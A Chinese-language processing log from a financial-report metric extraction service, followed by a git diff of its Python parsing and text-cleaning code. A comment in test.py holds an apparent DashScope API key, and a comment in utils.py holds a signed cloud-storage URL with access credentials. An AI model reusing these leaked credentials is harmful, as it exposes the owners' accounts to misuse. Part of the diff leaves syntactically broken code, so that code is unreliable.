 2024-12-29 16:18:28,942|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,942|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,942|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,942|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,942|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,943|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,943|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:28,943|zzb_logger  : INFO     被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
 2024-12-29 16:18:28,943|zzb_logger  : INFO     被删除的字符: 不适用不适用
 2024-12-29 16:18:29,637|zzb_logger  : INFO     提取指标任务 70-80 (39120)...
 2024-12-29 16:18:42,814|zzb_logger  : INFO     被删除的字符: 000000
 2024-12-29 16:18:42,815|zzb_logger  : INFO     被删除的字符: 000000
 2024-12-29 16:18:42,815|zzb_logger  : INFO     被删除的字符: 000000
 2024-12-29 16:18:42,815|zzb_logger  : INFO     被删除的字符: 000000
 2024-12-29 16:18:42,815|zzb_logger  : INFO     被删除的字符: 000000
 2024-12-29 16:18:42,815|zzb_logger  : INFO     被删除的字符: 000000
 2024-12-29 16:18:46,511|zzb_logger  : INFO     提取指标 40-50 runs 20.96 seconds.
 2024-12-29 16:18:54,027|zzb_logger  : INFO     提取指标 70-80 runs 24.39 seconds.
 2024-12-29 16:19:17,236|zzb_logger  : INFO     提取指标 60-70 runs 48.93 seconds.
 2024-12-29 16:19:20,151|zzb_logger  : INFO     提取指标 30-40 runs 55.96 seconds.
 2024-12-29 16:19:40,383|zzb_logger  : INFO     提取指标 50-60 runs 73.47 seconds.
 2024-12-29 16:20:06,573|zzb_logger  : INFO     提取指标 0-10 runs 106.39 seconds.
 2024-12-29 16:20:44,937|zzb_logger  : INFO     提取指标 10-20 runs 143.36 seconds.
 2024-12-29 16:20:50,959|zzb_logger  : INFO     提取指标 20-30 runs 148.11 seconds.
 2024-12-29 16:20:51,337|zzb_logger  : INFO     表格指标抽取完成，任务ID:201917
 2024-12-29 16:20:51,337|zzb_logger  : INFO     表格指标抽取 201917 完成，耗时153.23 秒。
 2024-12-29 16:20:51,337|zzb_logger  : INFO     启动这个指标归一化任务ID-修改测试:201917
 2024-12-29 16:20:51,549|zzb_logger  : INFO     目录黑名单为：[]
 2024-12-29 16:20:52,316|zzb_logger  : INFO     向量配置数据查询 0.11 秒。
 2024-12-29 16:20:52,317|zzb_logger  : INFO     insert_table_measure_from_vector_async_process方法走的半年报
 2024-12-29 16:20:54,191|zzb_logger  : INFO     Run task 0-351 (41216)...
 2024-12-29 16:20:54,192|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:20:54,742|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:20:55,664|zzb_logger  : INFO     Run task 351-702 (16388)...
 2024-12-29 16:20:55,664|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:20:56,152|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:20:57,120|zzb_logger  : INFO     Run task 702-1053 (41796)...
 2024-12-29 16:20:57,120|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:20:57,611|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:20:58,818|zzb_logger  : INFO     Run task 1053-1404 (39320)...
 2024-12-29 16:20:58,818|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:20:59,324|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:21:00,159|zzb_logger  : INFO     Run task 1404-1755 (41868)...
 2024-12-29 16:21:00,159|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:21:00,887|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:21:01,473|zzb_logger  : INFO     Run task 1755-2106 (26816)...
 2024-12-29 16:21:01,473|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:21:02,171|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:21:02,832|zzb_logger  : INFO     Run task 2106-2457 (32120)...
 2024-12-29 16:21:02,832|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:21:03,703|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:21:04,179|zzb_logger  : INFO     等待所有子任务完成，任务ID:201917
 2024-12-29 16:21:04,179|zzb_logger  : INFO     Run task 2457-2815 (38332)...
 2024-12-29 16:21:04,179|zzb_logger  : INFO     插入数据 2815
 2024-12-29 16:21:04,886|zzb_logger  : INFO     黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
 2024-12-29 16:23:00,285|zzb_logger  : INFO     所有子任务完成，任务ID:201917
 2024-12-29 16:23:00,286|zzb_logger  : INFO     启动指标归一化任务ID:201917
 2024-12-29 16:23:00,286|zzb_logger  : INFO     向量更新时间 127.97 秒。
 2024-12-29 16:23:00,474|zzb_logger  : INFO     更新数据查询 0.17 秒。
 2024-12-29 16:23:00,474|zzb_logger  : INFO     update_ori_measure方法走的是半年报
 2024-12-29 16:23:00,474|zzb_logger  : INFO     更新数据更新 0.00 秒。
 2024-12-29 16:23:00,522|zzb_logger  : INFO     更新数据写入 0.05 秒。
 2024-12-29 16:23:00,522|zzb_logger  : INFO     归一化完成任务ID:201917
 2024-12-29 16:23:00,522|zzb_logger  : INFO     任务 201917 完成，耗时344.83 秒。
 2024-12-29 16:23:00,669|zzb_logger  : INFO     通知任务状态url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=1
 2024-12-29 16:23:00,669|zzb_logger  : INFO     通知任务状态任务:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
        "http://www.w3.org/TR/html4/strict.dtd">
 <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
        <title>Error response</title>
    </head>
    <body>
        <h1>Error response</h1>
        <p>Error code: 404</p>
        <p>Message: File not found.</p>
        <p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
    </body>
 </html>
 2024-12-29 16:23:00,821|zzb_logger  : INFO     任务 201917 完成
--- a/zzb_data_word/main_word.py
+++ b/zzb_data_word/main_word.py
@ -427,19 +427,18 @@ def process_text_content(file_id,texts,tables,full_texts,type =0):
                        "type" : "text",
                        'content' : line_text,
                    }},conn,cursor,"word_parse_process")
-
+                    # 给慎用词校验用
-            # 给慎用词校验用
+                    db_service_word.insert_word_parse_process({
-            db_service_word.insert_word_parse_process({
+                        'file_id': file_id,
-                'file_id': file_id,
+                        'page_num': t["index"],
-                'page_num': t["index"],
+                        'page_count': 100,
-                'page_count': 100,
+                        'type': 'text',
-                'type': 'text',
+                        'content': {
-                'content': {
+                            'page_num': t["index"],
-                    'page_num': t["index"],
+                            'table_index': t["index"],
-                    'table_index': t["index"],
+                            "type": "text",
-                    "type": "text",
+                            'content': line_text,
-                    'content': line_text,
+                        }}, conn, cursor, "word_parse_data")
                }}, conn, cursor, "word_parse_data")
            table_name = "word_text_info"
            if type == 1:
@ -519,12 +518,12 @@ def get_table_measure(file_id, word_tables, record_range):
        record_start = record_range.split('-')[0]
        record_end = record_range.split('-')[1]
        for index in range(int(record_start),int(record_end)):
-            t = word_tables[index]
+            t = word_tables[index][0]
            measure_obj =[]
            data_dict = {}
            measure_list = []
            try:
-                arr = np.array(t['data'])
+                arr = np.array(t["data"])
                rows, cols = arr.shape
                if rows == 1 and cols == 1:
                    continue  
@ -679,7 +678,7 @@ def update_measure_data(file_id,file_path,parent_table_pages):
    # 创建一个cursor对象来执行SQL语句
    cursor_app = conn_app.cursor(buffered=True)
    applog.info(f'目录黑名单为：{parent_table_pages}')
-    db_service_word.delete_to_run(conn,cursor,file_id)
+    # db_service_word.delete_to_run(conn,cursor,file_id)
    db_service_word.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path)
    # #指标归一化处理
@ -692,15 +691,39 @@ def update_measure_data(file_id,file_path,parent_table_pages):
 def merge_consecutive_arrays(word_info):
    merged_objects = []
    temp_list = []
    for info_obj in word_info:
        try:
            if info_obj['type'] == 'table':
                # 如果对象是表格，将其元素添加到临时列表中
-                merged_objects.append(info_obj)
+                data = info_obj['data']
                if not data:
                    continue
                first_row = data[0]
                if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and  len(temp_list) == 0:
                    temp_list.append(info_obj)
                elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
                    merged_objects.append(temp_list)
                    temp_list = []
                    temp_list.append(info_obj)
                elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
                    temp_data = temp_list[-1]['data']
                    temp_data = list(temp_data)
                    for row in  list(info_obj['data']):
                        temp_data.append(row)
                    info_obj['data'] = temp_data
                    temp_list.clear()
                    temp_list.append(info_obj)
        except Exception as e:
            applog.error(f"解析数据错误: {e}")
    if temp_list:
        merged_objects.append(temp_list)    
    return merged_objects
 def merge_consecutive_arrays_v1(pdf_info):
@ -775,7 +798,6 @@ def start_table_measure_job(file_id):
    records_range_parts = utils.get_range(len(word_tables),MEASURE_COUNT)
    processes = []
    for record_range in records_range_parts:
        # get_table_measure(file_id,word_tables,record_range,)
        p = Process(target=get_table_measure, args=(file_id,word_tables,record_range,))
        processes.append(p)
        p.start()
--- a/zzb_data_word/parse_word/parse_word.py
+++ b/zzb_data_word/parse_word/parse_word.py
@ -252,8 +252,8 @@ def append_to_file(file_path, text):
 if __name__ == "__main__":
    current_directory = os.getcwd()
-    docx_relative_path = 'file/docx/101.docx'  
+    docx_relative_path = '..\\file\\docx\\101.docx'
-    file_relative_path = 'file/docx/test1.txt' 
+    file_relative_path = '..\\file\\docx\\test1.txt'
    docx_path = os.path.join(current_directory, docx_relative_path)
    file_path = os.path.join(current_directory, file_relative_path)
    try:
--- a/zzb_data_word/test.py
+++ b/zzb_data_word/test.py
@ -1,22 +1,20 @@
-from http import HTTPStatus
+from dashscope import BatchTextEmbedding
-import dashscope
+import requests
 #
 # dashscope.api_key='sk-2d6352a4c9b142f58b75cd9c8222bd91'
 # messages = [{'role': 'system', 'content': 'You are a helpful assistant.'},
 #             {'role': 'user', 'content': '如何做西红柿鸡蛋？'}]
 #
 # response = dashscope.Generation.call(
 #     model='qwen-turbo',
 #     messages=messages,
 #     result_format='message',  # set the result to be "message" format.
 # )
 #
 # if response.status_code == HTTPStatus.OK:
 #     print(response)
 # else:
 #     print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
 #         response.request_id, response.status_code,
 #         response.code, response.message
 #     ))
-print("sdas00"*2)
+def call():
    result = BatchTextEmbedding.call(BatchTextEmbedding.Models.text_embedding_async_v1,
                                     url="https://modelscope.oss-cn-beijing.aliyuncs.com/resource/text_embedding_file.txt",
                                     # url='http://127.0.0.1:text_embedding_file.txt'
                                     text_type="document")
    url = result.output.url
    response = requests.get(url)
    # 检查请求是否成功
    if response.status_code == 200:
        # 获取网页的 HTML 内容
        html_content = response.text
        print(html_content)
 if __name__ == '__main__':
    call()
--- a/zzb_data_word/utils.py
+++ b/zzb_data_word/utils.py
@ -7,9 +7,14 @@ import json
 from datetime import datetime
 import re,os,time
 import requests
 import config
 import numpy as np
 from docx2pdf import convert
 from config import api_key
 dashscope.api_key = api_key
 def get_md5(str):
    import hashlib
@ -53,8 +58,7 @@ def get_clean_text(text):
    #terms_3 = ["固定资产","短期借款","合同负债","在建工程","商誉"]
    #不可以出现同比之类的
    terms_4 = ['比', '率', '占','至','年以内','年以上','年内','1-2年','2-3年','3-4年','4-5年','准备','在途','增值','评估','利息','应计','改良','跌价','补助','投资']
-    dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日",
+    dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日", "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
              "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
    #dates = [ "2021年12月31日","2022年12月31日","2023年12月31日","2022年1月1日","2023年1月1日", "2024年1月1日", "2022年6月30日","2023年6月30日","2024年6月30日","2021年初","2022年初","2023年初","2024年初",'2021年末','2022年末','2023年末','2024年末',"2023年","2022年","2021年"]
    if any(term in text for term in terms_4):
        return text
@ -90,7 +94,7 @@ def get_clean_text(text):
        return pattern.sub(lambda match: replacements[match.group(0)], text)
    text = replace_all(text, replacement_dict)
    #单独出现12月31日时，就剔除掉
-    pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
+    pattern_year = r'(?<!2026年|2025年|2024年|2023年|2022年|2021年)12月31日'
    text = re.sub(pattern_year, '', text)
    pattern = r"\（[^）]*\）|\([^)]*\)"  # 增加英文括号的匹配
@ -111,7 +115,7 @@ def get_clean_text(text):
        "三": "",
        "年内到期":"年内到期",
        "1－6月":"",
-         "发行新股":"发行新股",
+        "发行新股":"发行新股",
    }
    #针对text的括号内容进行识别判断
    for match in matches:
@ -129,6 +133,21 @@ def get_clean_text(text):
            text = re.sub(r"[^\w\s]", "", text)
    return text
 def convert_docx_to_pdf(file_path):
    # 检查文件是否为 .docx 格式
    if file_path.lower().endswith('.docx'):
        # 生成 PDF 文件路径
        pdf_path = os.path.splitext(file_path)[0] + '.pdf'
        try:
            # 执行转换
            convert(file_path, pdf_path)
            print(f"转换成功: {pdf_path}")
        except Exception as e:
            print(f"转换失败: {e}")
    else:
        print("错误: 文件必须是 .docx 格式。")
 def save_pdf_from_url(url, file_path):
    from urllib.parse import unquote
    # 发起 GET 请求并保存文件
@ -142,9 +161,10 @@ def save_pdf_from_url(url, file_path):
        # 从处理后的URL中提取文件名
        # 提取文件名
        file_name = url_without_params.split('/')[-1]
-        
+        #https://financial-report-test.obs.cn-east-3.myhuaweicloud.com:443/upload/file/909f3dd3337a4dd4bc24fb4748c6c76e.PDF?AccessKeyId=IIDIMIUZ1UBBVPKIVB4W&Expires=1726798358&Signature=fKgrDPjmd99Nje4wwvBJxmFlXZY%3D
        # 指定本地文件保存路径
        local_file_path = file_path + file_name
        # local_file_path = convert_docx_to_pdf(local_file_path)
        with open(local_file_path, 'wb') as file:
            file.write(response.content)
@ -279,20 +299,39 @@ def check_black_list(meta_measure, pdf_measure, black_array):
 def check_black_list_old(meta_measure,pdf_measure):
    # 判断指标名是否包含黑名单词
    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
-    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
+    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
-                   ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润','扣非净利润:净资产,净利率,年度公司'
+                   ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
-                   ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
+                   ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
-                   ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除','非经常性损益:扣除非经常性损益'
+                   ,'扣非净利润:净资产,净利率,年度公司'
-                   ,'基本每股收益:稀释每股收益,发行新股','稀释每股收益:基本每股收益,发行新股','总资产:净资产','应收账款:应付账款,年以上,内,至,到'
+                   ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
-                   ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到','应付账款:应收账款,年以上,内,至,到','长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押','研发投入:比例,比率,占比,费用,占'
+                   ,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
-                   ,'资本化研发投入:比例,比率,占比,费用,占','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用'
+                   ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
-                   ,'上年年末:1月1日','期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
+                   ,'非经常性损益:扣除非经常性损益'
                   ,'基本每股收益:稀释每股收益,发行新股'
                   ,'稀释每股收益:基本每股收益,发行新股'
                   ,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
                   ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
                   ,'应付账款:应收账款,年以上,内,至,到'
                   ,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
                   ,'研发投入:比例,比率,占比,费用,占'
                   ,'资本化研发投入:比例,比率,占比,费用,占'
                   ,'资本化研发投入占比:金额,费用'
                   ,'研发投入占营业收入比例:金额,费用'
                   ,'上年年末:1月1日'
